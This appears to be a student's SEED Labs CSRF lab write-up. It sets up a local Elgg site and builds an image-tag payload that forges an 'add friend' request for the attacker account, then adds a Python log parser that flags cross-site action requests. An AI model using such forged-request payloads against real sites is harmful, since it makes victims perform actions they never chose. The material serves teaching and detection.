SEED Lab - Web Security 1 - CSRF Lab
1. Lab Setup
1.1 Download the SEED Labs Ubuntu 16.04 image, SEEDUbuntu-16.04-32bit.zip, from the MediaFire link (XunLei downloads it quickly). Extract the zip file.
1.2 Create a VirtualBox VM and select the extracted SEEDUbuntu-16.04-32bit.vmdk file. Run the VM.
2. CSRF Attack - add friend
2.1 Run Firefox and visit www.csrflabelgg.com. Because /etc/hosts includes "127.0.0.1 www.csrflabelgg.com", the request never leaves the VM.
2.2 Log in as Samy/seedsamy. Create "addfriend.html" in Vim:
<img src="http://www.csrflabelgg.com/action/friends/add?friend=45"
     alt="image" width="100" height="100" />  <!-- samy=45 -->
$ cp addfriend.html /var/www/CSRF/Attacker/index.html
In Elgg, Samy sends Alice a message containing the URL www.csrflabattacker.com.
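From the defender's side, the forged request above is visible in the web server log as an /action/ request whose Referer is another site. The following is an added example, not part of the original lab notes; it assumes the server writes Apache "combined" format logs, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit

# Assumption: Apache "combined" log format:
# client ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

SITE_HOST = "www.csrflabelgg.com"  # the Elgg site used in this lab
ACTION_PREFIX = "/action/"         # state-changing endpoints, e.g. /action/friends/add


def cross_site_actions(lines, site_host=SITE_HOST):
    """Return (time, path, referer_host) for action requests sent from another site."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or not m["path"].startswith(ACTION_PREFIX):
            continue  # unparsable line, or not a state-changing request
        referer = m["referer"]
        if referer in ("", "-"):
            continue  # no Referer header: cannot be attributed either way
        ref_host = (urlsplit(referer).hostname or "").lower()
        if ref_host != site_host:
            hits.append((m["time"], m["path"], ref_host))
    return hits


# Constructed sample log lines (not captured from the lab VM).
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Oct/2019:10:00:01 -0400] "GET /action/friends/add?friend=45 HTTP/1.1" '
    '302 0 "http://www.csrflabattacker.com/" "Mozilla/5.0"',
    '127.0.0.1 - - [10/Oct/2019:10:00:05 -0400] "GET /action/friends/add?friend=42 HTTP/1.1" '
    '302 0 "http://www.csrflabelgg.com/members" "Mozilla/5.0"',
    '127.0.0.1 - - [10/Oct/2019:10:00:09 -0400] "GET /profile/samy HTTP/1.1" '
    '200 5120 "http://www.csrflabattacker.com/" "Mozilla/5.0"',
    '127.0.0.1 - - [10/Oct/2019:10:00:12 -0400] "GET /action/friends/add?friend=45 HTTP/1.1" '
    '302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for time, path, ref_host in cross_site_actions(SAMPLE_LOG):
        print(f"{time}  {path}  <- referred by {ref_host}")
```

Only the first sample line is reported: the same-site action, the cross-site link to a read-only page, and the request without a Referer are all skipped.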